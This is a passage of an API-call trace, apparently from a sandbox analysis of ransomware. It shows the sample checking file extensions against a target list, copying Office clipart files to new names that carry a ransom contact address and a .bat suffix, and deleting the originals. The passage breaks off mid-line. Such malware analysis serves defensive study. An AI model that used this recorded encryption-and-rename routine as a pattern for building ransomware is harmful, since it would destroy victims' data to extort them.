-1 [0062.493] lstrlenW (lpString=".pdf") returned 4 [0062.493] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.493] lstrlenW (lpString=".xls") returned 4 [0062.493] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.493] lstrlenW (lpString=".xlsx") returned 5 [0062.493] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.493] lstrlenW (lpString=".ppt") returned 4 [0062.493] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0062.493] lstrlenW (lpString=".zip") returned 4 [0062.493] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.493] lstrlenW (lpString=".rar") returned 4 [0062.493] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.493] lstrlenW (lpString=".bz2") returned 4 [0062.493] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.493] lstrlenW (lpString=".7z") returned 3 [0062.493] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0062.493] lstrlenW (lpString=".dbf") returned 4 [0062.493] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0062.493] lstrlenW (lpString=".1cd") returned 4 [0062.493] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0062.493] lstrlenW (lpString=".jpg") returned 4 [0062.493] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0062.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0062.494] lstrlenW (lpString=".doc") returned 4 [0062.494] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.494] lstrlenW (lpString=".docx") returned 5 [0062.494] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.494] lstrlenW (lpString=".pdf") returned 4 [0062.494] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.494] lstrlenW (lpString=".xls") returned 4 [0062.494] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.494] lstrlenW (lpString=".xlsx") returned 5 [0062.494] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.494] lstrlenW (lpString=".ppt") returned 4 [0062.494] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0062.494] lstrlenW (lpString=".zip") returned 4 [0062.494] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.494] lstrlenW (lpString=".rar") returned 4 [0062.494] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.494] lstrlenW (lpString=".bz2") returned 4 [0062.494] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.494] lstrlenW (lpString=".7z") returned 3 [0062.494] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0062.494] lstrlenW (lpString=".dbf") returned 4 [0062.494] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0062.494] lstrlenW (lpString=".1cd") returned 4 [0062.494] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 68 [0062.494] lstrlenW (lpString=".jpg") returned 4 [0062.494] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.495] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.495] lstrlenW (lpString="AN04326_.WMF") returned 12 [0062.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0062.495] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=3348) returned 1 [0062.495] CloseHandle (hObject=0x2c8) returned 1 [0062.495] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf")) returned 0x220 [0062.495] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0062.495] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.495] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.496] GetLastError () returned 0x0 [0062.496] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xd14, lpOverlapped=0x0) returned 1 [0062.511] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xd20, lpOverlapped=0x0) returned 1 [0062.512] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.512] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.512] SetEndOfFile (hFile=0x370) returned 1 [0062.512] CloseHandle (hObject=0x370) returned 1 [0062.513] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.513] SetEndOfFile (hFile=0x2c8) returned 1 [0062.514] CloseHandle (hObject=0x2c8) returned 1 [0062.514] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.514] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf")) returned 1 [0062.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0062.514] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0062.514] lstrlenW (lpString=".doc") returned 4 [0062.514] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.514] lstrlenW (lpString=".docx") returned 5 [0062.514] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.514] lstrlenW (lpString=".pdf") returned 4 [0062.514] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.514] lstrlenW (lpString=".xls") returned 4 [0062.514] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.514] lstrlenW (lpString=".xlsx") returned 5 [0062.514] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.515] lstrlenW (lpString=".ppt") returned 4 [0062.515] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0062.515] lstrlenW (lpString=".zip") returned 4 [0062.515] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.515] lstrlenW (lpString=".rar") returned 4 [0062.515] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.515] lstrlenW (lpString=".bz2") returned 4 [0062.515] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.515] lstrlenW (lpString=".7z") returned 3 [0062.515] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0062.515] lstrlenW (lpString=".dbf") returned 4 [0062.515] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0062.515] lstrlenW (lpString=".1cd") returned 4 [0062.515] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0062.515] lstrlenW (lpString=".jpg") returned 4 [0062.515] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0062.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0062.515] lstrlenW (lpString=".doc") returned 4 [0062.515] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.515] lstrlenW (lpString=".docx") returned 5 [0062.515] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.515] lstrlenW (lpString=".pdf") returned 4 [0062.515] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.515] lstrlenW (lpString=".xls") returned 4 [0062.515] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.515] lstrlenW (lpString=".xlsx") returned 5 [0062.516] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.516] lstrlenW (lpString=".ppt") returned 4 [0062.516] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0062.516] lstrlenW (lpString=".zip") returned 4 [0062.516] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.516] lstrlenW (lpString=".rar") returned 4 [0062.516] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.516] lstrlenW (lpString=".bz2") returned 4 [0062.516] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.516] lstrlenW (lpString=".7z") returned 3 [0062.516] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0062.516] lstrlenW (lpString=".dbf") returned 4 [0062.516] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0062.516] lstrlenW (lpString=".1cd") returned 4 [0062.516] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 68 [0062.516] lstrlenW (lpString=".jpg") returned 4 [0062.516] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.516] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.516] lstrlenW (lpString="AN04369_.WMF") returned 12 [0062.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.525] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=4808) returned 1 [0062.525] CloseHandle (hObject=0x368) returned 1 [0062.525] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf")) returned 0x220 [0062.525] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.525] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.525] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.527] GetLastError () returned 0x0 [0062.527] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x12c8, lpOverlapped=0x0) returned 1 [0062.559] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x12d0, lpOverlapped=0x0) returned 1 [0062.560] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.560] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.560] SetEndOfFile (hFile=0x354) returned 1 [0062.564] CloseHandle (hObject=0x354) returned 1 [0062.565] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.565] SetEndOfFile (hFile=0x368) returned 1 [0062.568] CloseHandle (hObject=0x368) returned 1 [0062.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.568] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf")) returned 1 [0062.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0062.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0062.569] lstrlenW (lpString=".doc") returned 4 [0062.569] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.569] lstrlenW (lpString=".docx") returned 5 [0062.569] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.569] lstrlenW (lpString=".pdf") returned 4 [0062.569] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.569] lstrlenW (lpString=".xls") returned 4 [0062.569] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.569] lstrlenW (lpString=".xlsx") returned 5 [0062.569] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.569] lstrlenW (lpString=".ppt") returned 4 [0062.569] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0062.569] lstrlenW (lpString=".zip") returned 4 [0062.569] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.569] lstrlenW (lpString=".rar") returned 4 [0062.569] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.569] lstrlenW (lpString=".bz2") returned 4 [0062.569] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.569] lstrlenW (lpString=".7z") returned 3 [0062.569] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0062.569] lstrlenW (lpString=".dbf") returned 4 [0062.569] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0062.569] lstrlenW (lpString=".1cd") returned 4 [0062.569] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0062.569] lstrlenW (lpString=".jpg") returned 4 [0062.569] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0062.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0062.570] lstrlenW (lpString=".doc") returned 4 [0062.570] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.570] lstrlenW (lpString=".docx") returned 5 [0062.570] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.570] lstrlenW (lpString=".pdf") returned 4 [0062.570] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.570] lstrlenW (lpString=".xls") returned 4 [0062.570] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.570] lstrlenW (lpString=".xlsx") returned 5 [0062.570] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.570] lstrlenW (lpString=".ppt") returned 4 [0062.570] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0062.570] lstrlenW (lpString=".zip") returned 4 [0062.570] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.570] lstrlenW (lpString=".rar") returned 4 [0062.570] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.570] lstrlenW (lpString=".bz2") returned 4 [0062.570] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.570] lstrlenW (lpString=".7z") returned 3 [0062.570] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0062.570] lstrlenW (lpString=".dbf") returned 4 [0062.570] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0062.570] lstrlenW (lpString=".1cd") returned 4 [0062.570] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 68 [0062.570] lstrlenW (lpString=".jpg") returned 4 [0062.570] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.570] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.571] lstrlenW (lpString="BD00146_.WMF") returned 12 [0062.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.571] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=28948) returned 1 [0062.571] CloseHandle (hObject=0x368) returned 1 [0062.571] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf")) returned 0x220 [0062.571] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.571] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.571] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.572] GetLastError () returned 0x0 [0062.572] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x7114, lpOverlapped=0x0) returned 1 [0062.586] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x7120, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x7120, lpOverlapped=0x0) returned 1 [0062.587] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.587] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.587] SetEndOfFile (hFile=0x344) returned 1 [0062.587] CloseHandle (hObject=0x344) returned 1 [0062.588] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.588] SetEndOfFile (hFile=0x368) returned 1 [0062.589] CloseHandle (hObject=0x368) returned 1 [0062.589] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.590] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf")) returned 1 [0062.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0062.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0062.590] lstrlenW (lpString=".doc") returned 4 [0062.590] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.590] lstrlenW (lpString=".docx") returned 5 [0062.590] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.590] lstrlenW (lpString=".pdf") returned 4 [0062.590] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.590] lstrlenW (lpString=".xls") returned 4 [0062.590] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.590] lstrlenW (lpString=".xlsx") returned 5 [0062.590] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.590] lstrlenW (lpString=".ppt") returned 4 [0062.590] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.590] lstrlenW (lpString="C:\\Program 